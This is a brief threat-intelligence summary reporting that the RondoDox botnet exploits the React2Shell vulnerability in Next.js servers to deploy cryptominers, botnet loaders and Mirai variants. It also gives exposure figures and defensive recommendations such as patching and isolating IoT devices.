The RondoDox botnet is actively exploiting the React2Shell vulnerability to infect vulnerable Next.js servers and deploy various malware. This ongoing campaign involves large-scale IoT exploitation and targeted attacks by North Korean hackers, affecting thousands of internet-exposed assets. #React2Shell #RondoDox
Keypoints
- RondoDox exploits the React2Shell flaw to infect Next.js servers with malware and cryptominers.
- The botnet has transitioned through phases of reconnaissance, automated exploitation, and large-scale IoT deployment.
- Over 94,000 assets are vulnerable to React2Shell, with frequent exploitation attempts reported in December.
- RondoDox deploys payloads including coinminers, botnet loaders, and Mirai variants after probing servers.
- Recommendations include patching vulnerabilities, isolating IoT devices, and monitoring suspicious processes.